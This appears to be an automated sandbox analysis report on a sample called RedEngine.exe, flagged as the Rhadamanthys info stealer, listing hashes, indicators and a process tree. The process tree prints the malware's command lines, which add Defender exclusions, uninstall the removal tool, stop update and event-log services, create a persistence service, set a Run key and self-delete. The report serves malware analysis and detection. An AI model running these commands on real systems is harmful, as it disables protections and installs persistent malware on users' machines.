Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05-04-2024 17:02
Static task: static1
Behavioral task: behavioral1
  Sample: RedEngine.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: RedEngine.exe
  Resource: win10v2004-20240226-en
General
Target: RedEngine.exe
Size: 74KB
MD5: 8fb7a6bd32200aea3f517923285e39a8
SHA1: dc5c1e8293cce5d82c5d7d338fb3cee57d2b997d
SHA256: ccc95afa02727297eb7f6bbbe5e06d011ce4656c3b563e2841fad60d471e2f26
SHA512: 1445bc293350022e9302374df3915e71f3b8bd281db5a43bf67362b002896404e21a58e68963a6203d6ab04dffd5745c2ce1d2fbd650975936b327befa15e3a1
SSDEEP: 384:UWWFjyor85Z6coSQJ14p9FfVg6FHkosvxB2JeJhrpX5m4KbfocN4UCMfKqIOmRUG:ua5ZRo34pdsvpA1c3UzD9eXOeOiict9
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 2040 created 2612 | 2040 | liccheck.exe | sihost.exe
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
15 | 2740 | powershell.exe
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | RedEngine.exe
-
Executes dropped EXE 4 IoCs
Processes:
pid | process
3504 | lic.exe
2040 | liccheck.exe
3448 | LicGet.exe
2040 | ebvoxlrooljj.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " | LicGet.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | lic.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 3504 set thread context of 1448 | 3504 | lic.exe | dialer.exe
-
Launches sc.exe 9 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
4964 | sc.exe
3656 | sc.exe
3664 | sc.exe
5060 | sc.exe
3604 | sc.exe
1632 | sc.exe
2504 | sc.exe
3644 | sc.exe
4088 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 47 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
-
Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
pid | process
2740 | powershell.exe
2740 | powershell.exe
3076 | powershell.exe
3076 | powershell.exe
2040 | liccheck.exe
2040 | liccheck.exe
3988 | dialer.exe
3988 | dialer.exe
3988 | dialer.exe
3988 | dialer.exe
3504 | lic.exe
3144 | powershell.exe
3144 | powershell.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
1448 | dialer.exe
1448 | dialer.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
3504 | lic.exe
2040 | ebvoxlrooljj.exe
1448 | dialer.exe
1448 | dialer.exe
4476 | powershell.exe
4476 | powershell.exe
-
Suspicious behavior: LoadsDriver 64 IoCs
Processes:
pid (process name not recorded): 2148, 3220, 3992, 2904, 3352, 3060, 4748, 2768, 452, 4448, 2724, 972, 860, 3888, 1992, 1504, 2792, 1084, 2900, 4016, 1344, 5048, 1580, 1888, 2740, 2524, 3808, 3664, 2220, 4076, 4468, 2400, 4208, 2588, 1364, 724, 3972, 3168, 4700, 3076, 960, 4712, 1756, 1272, 4376, 1892, 4720, 4556, 3996, 3680, 60, 3412, 2548, 992, 5032, 4112, 1476, 4000, 2764, 5024, 4496, 3956, 4868, 692
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2740 | powershell.exe
Token: SeDebugPrivilege | 3076 | powershell.exe
Token: SeDebugPrivilege | 3144 | powershell.exe
Token: SeShutdownPrivilege | 3992 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3992 | powercfg.exe
Token: SeDebugPrivilege | 3504 | lic.exe
Token: SeShutdownPrivilege | 452 | powercfg.exe
Token: SeCreatePagefilePrivilege | 452 | powercfg.exe
Token: SeShutdownPrivilege | 3452 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3452 | powercfg.exe
Token: SeShutdownPrivilege | 336 | powercfg.exe
Token: SeCreatePagefilePrivilege | 336 | powercfg.exe
Token: SeDebugPrivilege | 1448 | dialer.exe
Token: SeDebugPrivilege | 4476 | powershell.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 2240 wrote to memory of 2740 | 2240 | RedEngine.exe | powershell.exe
PID 2240 wrote to memory of 2740 | 2240 | RedEngine.exe | powershell.exe
PID 2240 wrote to memory of 2740 | 2240 | RedEngine.exe | powershell.exe
PID 2740 wrote to memory of 3076 | 2740 | powershell.exe | powershell.exe
PID 2740 wrote to memory of 3076 | 2740 | powershell.exe | powershell.exe
PID 2740 wrote to memory of 3076 | 2740 | powershell.exe | powershell.exe
PID 2740 wrote to memory of 3504 | 2740 | powershell.exe | lic.exe
PID 2740 wrote to memory of 3504 | 2740 | powershell.exe | lic.exe
PID 2740 wrote to memory of 2040 | 2740 | powershell.exe | liccheck.exe
PID 2740 wrote to memory of 2040 | 2740 | powershell.exe | liccheck.exe
PID 2740 wrote to memory of 2040 | 2740 | powershell.exe | liccheck.exe
PID 2740 wrote to memory of 3448 | 2740 | powershell.exe | LicGet.exe
PID 2740 wrote to memory of 3448 | 2740 | powershell.exe | LicGet.exe
PID 2040 wrote to memory of 3988 | 2040 | liccheck.exe | dialer.exe
PID 2040 wrote to memory of 3988 | 2040 | liccheck.exe | dialer.exe
PID 2040 wrote to memory of 3988 | 2040 | liccheck.exe | dialer.exe
PID 2040 wrote to memory of 3988 | 2040 | liccheck.exe | dialer.exe
PID 2040 wrote to memory of 3988 | 2040 | liccheck.exe | dialer.exe
PID 2556 wrote to memory of 2248 | 2556 | cmd.exe | wusa.exe
PID 2556 wrote to memory of 2248 | 2556 | cmd.exe | wusa.exe
PID 3504 wrote to memory of 1448 | 3504 | lic.exe | dialer.exe
PID 3504 wrote to memory of 1448 | 3504 | lic.exe | dialer.exe
PID 3504 wrote to memory of 1448 | 3504 | lic.exe | dialer.exe
PID 3504 wrote to memory of 1448 | 3504 | lic.exe | dialer.exe
PID 3504 wrote to memory of 1448 | 3504 | lic.exe | dialer.exe
PID 3504 wrote to memory of 1448 | 3504 | lic.exe | dialer.exe
PID 3504 wrote to memory of 1448 | 3504 | lic.exe | dialer.exe
PID 8 wrote to memory of 2392 | 8 | cmd.exe | choice.exe
PID 8 wrote to memory of 2392 | 8 | cmd.exe | choice.exe
PID 1448 wrote to memory of 616 | 1448 | dialer.exe | winlogon.exe
PID 1448 wrote to memory of 668 | 1448 | dialer.exe | lsass.exe
PID 1448 wrote to memory of 948 | 1448 | dialer.exe | svchost.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 1448 wrote to memory of 64 | 1448 | dialer.exe | dwm.exe
PID 1448 wrote to memory of 512 | 1448 | dialer.exe | svchost.exe
PID 1448 wrote to memory of 428 | 1448 | dialer.exe | svchost.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 1448 wrote to memory of 1032 | 1448 | dialer.exe | svchost.exe
PID 1448 wrote to memory of 1060 | 1448 | dialer.exe | svchost.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 1448 wrote to memory of 1068 | 1448 | dialer.exe | svchost.exe
PID 1448 wrote to memory of 1156 | 1448 | dialer.exe | svchost.exe
PID 1448 wrote to memory of 1184 | 1448 | dialer.exe | svchost.exe
PID 1448 wrote to memory of 1304 | 1448 | dialer.exe | svchost.exe
PID 1448 wrote to memory of 1312 | 1448 | dialer.exe | svchost.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
PID 668 wrote to memory of 2656 | 668 | lsass.exe | sysmon.exe
Processes
Process tree (indentation shows parent/child depth as recorded by the sandbox):

- C:\Windows\system32\winlogon.exe (PID 616)
  command line: winlogon.exe
  - C:\Windows\system32\dwm.exe (PID 64)
    command line: "dwm.exe"
- C:\Windows\system32\lsass.exe (PID 668)
  command line: C:\Windows\system32\lsass.exe
  signatures: Suspicious use of WriteProcessMemory
- C:\Windows\system32\svchost.exe (PID 948)
  command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe (PID 512)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\system32\svchost.exe (PID 428)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
  signatures: Modifies data under HKEY_USERS
- C:\Windows\System32\svchost.exe (PID 1032)
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe (PID 1060)
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\System32\svchost.exe (PID 1068)
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\System32\svchost.exe (PID 1156)
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- C:\Windows\system32\svchost.exe (PID 1184)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
- C:\Windows\system32\svchost.exe (PID 1304)
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe (PID 1312)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\system32\sihost.exe (PID 2612)
  command line: sihost.exe
  - C:\Windows\SysWOW64\dialer.exe (PID 3988)
    command line: "C:\Windows\system32\dialer.exe"
    signatures: Suspicious behavior: EnumeratesProcesses
- C:\Windows\sysmon.exe (PID 2656)
  command line: C:\Windows\sysmon.exe
- C:\Users\Admin\AppData\Local\Temp\RedEngine.exe (PID 2240)
  command line: "C:\Users\Admin\AppData\Local\Temp\RedEngine.exe"
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2740)
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3076)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#ufh#>[System.Windows.Forms.MessageBox]::Show('No license! Connect your Steam account in order to get a license. Make sure that you are not using alternative account, otherwise license will not be given. (This is done to prevent cracking)','','OK','Warning')<#zqe#>;
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Roaming\lic.exe (PID 3504)
      command line: "C:\Users\Admin\AppData\Roaming\lic.exe"
      signatures: Executes dropped EXE; Drops file in System32 directory; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 3144)
        command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\cmd.exe (PID 2556)
        command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\wusa.exe (PID 2248)
          command line: wusa /uninstall /kb:890830 /quiet /norestart
      - C:\Windows\system32\sc.exe (PID 5060)
        command line: C:\Windows\system32\sc.exe stop UsoSvc
        signatures: Launches sc.exe
      - C:\Windows\system32\sc.exe (PID 3604)
        command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
        signatures: Launches sc.exe
      - C:\Windows\system32\sc.exe (PID 1632)
        command line: C:\Windows\system32\sc.exe stop wuauserv
        signatures: Launches sc.exe
      - C:\Windows\system32\sc.exe (PID 2504)
        command line: C:\Windows\system32\sc.exe stop bits
        signatures: Launches sc.exe
      - C:\Windows\system32\sc.exe (PID 4964)
        command line: C:\Windows\system32\sc.exe stop dosvc
        signatures: Launches sc.exe
      - C:\Windows\system32\powercfg.exe (PID 3452)
        command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe (PID 336)
        command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe (PID 452)
        command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe (PID 3992)
        command line: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        signatures: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\dialer.exe (PID 1448)
        command line: C:\Windows\system32\dialer.exe
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\sc.exe (PID 3644)
        command line: C:\Windows\system32\sc.exe delete "FJIEXRSL"
        signatures: Launches sc.exe
      - C:\Windows\system32\sc.exe (PID 3656)
        command line: C:\Windows\system32\sc.exe create "FJIEXRSL" binpath= "C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe" start= "auto"
        signatures: Launches sc.exe
      - C:\Windows\system32\sc.exe (PID 3664)
        command line: C:\Windows\system32\sc.exe stop eventlog
        signatures: Launches sc.exe
      - C:\Windows\system32\sc.exe (PID 4088)
        command line: C:\Windows\system32\sc.exe start "FJIEXRSL"
        signatures: Launches sc.exe
      - C:\Windows\system32\cmd.exe (PID 8)
        command line: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\lic.exe"
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\choice.exe (PID 2392)
          command line: choice /C Y /N /D Y /T 3
    - C:\Users\Admin\AppData\Roaming\liccheck.exe (PID 2040)
      command line: "C:\Users\Admin\AppData\Roaming\liccheck.exe"
      signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Roaming\LicGet.exe (PID 3448)
      command line: "C:\Users\Admin\AppData\Roaming\LicGet.exe"
      signatures: Executes dropped EXE; Adds Run key to start application
- C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe (PID 2040)
  command line: C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe
  signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 4476)
    command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\sihost.exe (PID 2936)
  command line: sihost.exe
- C:\Windows\system32\sihost.exe (PID 1560)
  command line: sihost.exe
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
Downloads
-
Filesize: 2KB
MD5: 33943ddf7ab410f98e2bff392ed62441
SHA1: f27016ff8b33cb2b8df39364d0ae2bf8a2c00e52
SHA256: 186b4f81ac762e8bda66248fd38ce38190d108b5c430293f64c1dcef5ff32b65
SHA512: 918d18568c816149d1dd848e1a5bfba9f3e84c9e4e23d4e4982c05cf9366ceac265ba82333aa2a917d2374fd6eb62877f28a92b226baee03918d8608af2d7ede
-
Filesize: 17KB
MD5: 5efb49cec0db02811b5a377cd2518d69
SHA1: d2d8deebaa583fae9f6be1267c1062ce385aab86
SHA256: 6dafee793a1899a409a908ab669a4075d8d58d0870dfc1d02db47b822b74a1b9
SHA512: 8a4e89709cd338411e025a558ce9eb02efd1936152209ea8d934214ccaae5eff112e42759b6d696e5d62d4951b1f872470541835149d51c3a43a4b7d14279c14
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 98KB
MD5: d505d50ab745d07a7c9cba97717febe4
SHA1: 528d34e656da344a33a5e3fe27ac43ad5f7dfd0a
SHA256: 87fad0da502598adcb3da26c2a260cefcec7f383d73b62f94d7c8175812c0fad
SHA512: 28a8975b6133c366cdcde075acbec07ce7be6fa7a98387dabe5d5c5024368ac9663705d668b1c48f4da6ae8b0f6b95798ac1e4abada6a5a885d431467c8febf1
-
Filesize: 2.8MB
MD5: 87f351e454deded1b279aef5a5d632e9
SHA1: a936b08d94983f58a31f1207d73fd640fcbabd1a
SHA256: 5543ea3c67eb8e9bb763a54e80a042dfa7b297d62610e7fe057d0fc7be49212c
SHA512: 3c40874adc3ea30d147b68ba74aadb0b0228a822137dd0db04daa611a6ecc8ee8e0bfc49fb7242dee60bc2fa6860575f4061c7ff8aa9e4105550c710316f2b8f
-
Filesize: 355KB
MD5: 091267b13791fb80a21044c473e74298
SHA1: 7a4240532744ccb36fbd15f179dd0799b73de881
SHA256: 7ff6d4737f39fefefa9fc6d1f3dc31fcc968d0d45bb09a364457a0af51af860f
SHA512: e69a6d7309bd73a365f088918c7cae13a8b0925f5b395e38c9cd51509d5b451694a660143f5be4d24624b51f4a4a6a1c2c0fac0a650a539386a81e4eaa7e71c2